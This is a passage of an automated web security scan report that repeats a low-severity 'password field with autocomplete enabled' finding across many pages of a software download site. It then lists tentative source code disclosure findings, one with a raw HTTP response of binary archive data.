15.289. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.290. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.291. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.292. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.293. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.294. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.295. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.296. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.297. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.298. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.299. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.300. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.301. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.302. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.303. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.304. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.305. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.306. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.307. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.308. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.309. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.310. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.311. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.312. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.313. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.314. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.315. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.316. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.317. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.318. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.319. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.320. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.321. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.322. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.323. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.324. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.325. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.326. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.327. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.328. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.329. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.330. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.331. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.332. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.333. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.334. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.335. http://www.x64bitdownload.com/drivers/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.336. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.337. http://www.x64bitdownload.com/featured-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.338. http://www.x64bitdownload.com/linktous.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.339. http://www.x64bitdownload.com/new-reviews.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.340. http://www.x64bitdownload.com/new-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.341. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.342. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.343. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.344. http://www.x64bitdownload.com/submit-pad-file.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.345. http://www.x64bitdownload.com/tellafriend.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.346. http://www.x64bitdownload.com/top-software-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

16. Source code disclosure previous next
There are 7 instances of this issue:

http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
http://meyerweb.com/eric/tools/css/reset/
http://mozex.mozdev.org/index.html
http://www.addthis.com/bookmark.php
http://www.addthis.com/feed.php
http://www.kbsp.com/x/fonts/AKZIGBES.TTF
http://www.zazzle.com/netlingo

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

16.1. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://download.macromedia.com
Path:	/pub/shockwave/cabs/director/sw.cab

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1
Host: download.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 22 Oct 2010 12:14:09 GMT
ETag: "e6016-25803-94636640"
Accept-Ranges: bytes
Content-Length: 153603
Content-Type: text/plain
Expires: Mon, 24 Jan 2011 15:06:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 15:06:01 GMT
Connection: close

MSCF.....F......D............................F..............|.................V=..!.swdir.inf...........V=r. .installer.exe.q...tO..CK..}|T..?|.%..&. ....!(......t.9.....2.B..L..!I.sxi.$..2.F.........
...[SNIP]...
<........{ ..<?. D...%...C>.h..y11._yk&.?d`.M.6....u.]..9..v...
(......d.uq3./....,....x...k.p....[.]...n...{.....$..@^...).0`.D.&..........qq?.\..1...J.uq....S\.I.'.....a@..9..-....z.....wq.Lsq..l...=.8.8...F@!..X1].\..@    .........Z@.......b.... g.:]...8=.s.l1.=.P.R.u.6Nh.h[..#q.../h.00&/.N.m.c`9.!../I..#..^.$.'..|....1~.gx...0.o;Yn.<.t&...z#....9...X.".......!.....8."......`.....Ts....4.,.......!..dk.........m.N...~.N>..<T1..<:...jTg..C..#..j..0..'.V.....}u......@.,..b..OFGGU.....\(..2.F../.V....@...G.]..Ml...O.0...<..za{.&....A&.yZS....:;{...l...D...wT..v. Ga..z.N?8..0B...A6.r+.......6..L......[....4..........C
..WoaiA.)...Cm)^h../...3V..;m5~.h...9.A....`.)..s..o.. ...Ha..8B.)......Y.DB..i..C..&.p^...MH.=.Y..T^..9l{.......!..24.J....V..R..8..rE......m.....P..[...$.B0u..j.PCz].*..F?...]
.6y".6.P.1.@k.8..9...l.W4s...X.b....4..............
.&D.M..1.....,.w... %d.....C...W........7....+..x..."..A.+|....g...Z..c\.{4S.TH..N.@.Uk..Eq:.Bu..G+...I.O.*...G../M.    .e...<A.....m>e.4Z...#..`.e.......H.(.Gi....h......../..E..0=.vf........[7.T.M.."5..JG....,_.B..UV.i.M.K.y.........w=..........on.~.....u....-...5..4.
..5|f.X_/...3w..J..8"......+.E.....x....._.X...X.......K.Q.3.D..i...N&..,?..+7.&.f.0.*/<....| .8.......OdM....W&...l&v?.H...{J.".B..B'o...b./ar    '..f.=.7.....S~r....}`...^...=I.y.D.C.A.....m..]L.+..R...3.fc u.y.    ...+.=..t....Ia'<?.d.r&..!].D..K... ..!.N...{,.EHW..x.,+ce..b1.-v.!.2a......./.......eS...:.S....H,`.....O    O'...m.....)/.h...-~9lut......[V.p....:_...<.6r.fw..`+..._......-.....c..y.L..}....Zyp7.7.f...'dz..R....ub.qL..3..PF...@l...Xk..$d.>(..qU.. ....N.G8[.)".3l#....
5..LL!..Z5Tj@.....b.. ....OE0.A...ZIX....H...r...".X......a>b*...Zi..M.Cs....\...b|.e`..I.*zT(...#U....QVV[<I.P+.1YL+.M.[..M.*.Kwx.l..2#..|!.....&..d.C.`2B{'..j.YA[.g.Z>3x.l(...s....
.x}....p..5...JG![$H3.....*<...h.g\....S..
.#....AI.Cy.Kv.. .^..4.%...M.2......b.W:.H,..........(.....3....
8-..v.....Y?._..O_..y..C.c.........N..2.F.x|...6..O..'..?...].l..L.{iA..M...y.cS.d[....U..;N..F5...S...B..i`oj.Px.....~b..x.! ...9?....c..J.o.}.,h.../x._..$....R_.7.d........7......yC.yZ...Q.SF`.....bO.y....|M....P.k.4j.n...^.........3h}...I..k!.|RYB.4.@.....UX..\(u~). !y..45.I..6NG\.'.X...DEE...{*.."...r..,..U..
".....Lh.2.....1!Q7.....x..A/.V/...t.I...[WF......,..........~...."..-..n&.+k.....b7.m....,/0..2.p..........O..,.......Q^`..2.YTE......P.`.ct[
...t...3]-A.......7.D&-.NB.x...+..<....8...so=....O-.'.;...!d..pL.P=....;.I...*...&10_mow...t...=..N.....z.OJ...".*.`.."..@..`Y.QN.....%.<.;.1.R&_....`..{..f...0..td.M..l..T..Z..p.\f...r..t..C......h..I..tD.....9.....b.-..'..3.....3..]5.Q.....bJ.e.....ZGbqm..!=rX.$1N^d.fm..I...Y;@...L$..S...~1c...I.q.&~...j.K^.. O.K.Lp.u4.......i...C...r....x...(...#FT..dV.\*....0........hTY.G.o6..>.........tv..g....G.2...aZ...../3.*..(;...VZ.W....../........N..6..).....R..L.,k...tD.-...>.......a......Ml-......lC.e.    ?j.:..][...H.8.&..iT..;K.M-.s:.hI..o)"Y.r.U....3/.Z:.Mo....T.-..\4...W ..z..t....;i.....p....y0<Zf..3G.$~a.l..N..o.....\Q.5:.......vaD7?d...-.....b....m..Sl]y.,....r.'i.O.&c.F.K...1t.h........h-.y..XG...i&.!yP...L..I..8m....../.!^0.*3.....=...8..R.m./..a.... ...k...NJl"-b.gk....5.X{.N\.>;:...U..D3.5WcP:.;-.Ff"..e.E&S.y.......|[...&q?....+...M.I......=..Mq..U.^.e^..[..J|......,#3.4.>`5`..k...dn..W.z.B.........v.u-....7x.#.    y.......1....2..p...`.....m..........Eh..X.Sz..%.i.F....    .N..^o.....`..7.H.,@t"...~...(..f}k......-..n(
M$&9Mg...jgt..R......K...Gu........./.7..^..}.\.......P&..U..^-#....7..p.j...........?........R....X......._..u(..B.@.\z...........e......|..... q..    .$......r.......X......\..EJ....b.._.K,.!..d.....L.....3..v..y}r...A.;..+...v......I..iV1..U.W.]...........f.:.m....y..S.c!:7XwYa"|. ;...=..6.
...t:.EoE.l.2)I.qRi.C[.J..m...Fm.0......9Fg...v...d..3n.n..C.E..H...6ta^.D.i.#...........%...D.`....=.....|...).U........{J...&m..a0...*.N.Gy[...{Z.%f..c>Q*P..U.3......)......4...9...h...]t..B..if.|.A;.!..t..6......+..|..B........U..G..8.
s.5..Yt.#...Nz.j.....S..6j.+.'....=......x:...8N....\Z...a...hc.B.....<e...M.....]..m...~.....~ INv.I6i....2......N%S.u.J....R.4.&Z..L
#.... ....S.........P....YCC>.[).kb.s<IF.9.l.O.L..H&...7i.bH.{#M..)Z    ^(.....Q..SmCbV.D..1M.-b......V....Wj!.o.n....YhD0s4....9.v5.qt..j.f..1..XQw....;;.OV.h.. ....    .....Gb|.%.A.`Av......a......&.8..C....A&....u.#..:-Q..G*u...Ojl....+.W(...V..2.V.....B+...~R.>&".(.T.......I.t..TUps%".......f...r.@kU.....t..T.?xA..Nh&..[6..1bb..].(.0.b.\....=..Yc..7..6{......:{...W....1O..f..m5}....O.^a..F./E..4B.....yC..k..=....eU9..0...8.y..Q..%d...M...'0o.........NH...f.;.>...rt......y..M..e....|:.......%..-..8C8[..*
...}..i.>D.
]M.q:...Od7.*.l..c.....d...-t...?6.N'.lm4.....dc(?.~v.|t.[....v./.....#.>.....Q.....8Z8D..]&{..o'...|.v...?...l:.mb....,...5`..h(...[a.`.Y.oE.Z.v.{9q|..][!.J...._k..^.'......,v.-..G...b.5..&b....8:Zi......)X2..IR.....y.c.......-L.v#.|.......)u..si...x..0..N.Rjo.......\..=.....-r&.bs.........vxs.t.....K....O4S9.......t*...G.tF...l.[.E...T.`5.......qf....-Yq..p..V..m..Vc..b.*........R..I.j.y.-r7..f.JI.-r.....S|...o.HO...........8.]4..........`~.s..ID.....3FA+...S..V.-.I. ...N....^.N.K.)Ct"c..$...h..K.^..nR.v!#dQF.N.l.Nu6.P...-~.........[G...~.`(q9..|.].\..^4L8SOP...Z&O.%XFL#u.....{.....gl........@{.l.....v.iy..._aLl!..}.Q..i.^...S..L+...N...r.LR.I...ou......<...4S..~....iC...Q..(.A.H;....J.W .....^.&Ntd.V;......f..va...7...>........st.'..k....Gv>&..^....../....\.#?...sd.n...w........v.hc.......?.}..#P.O.g6.$;;sQ..
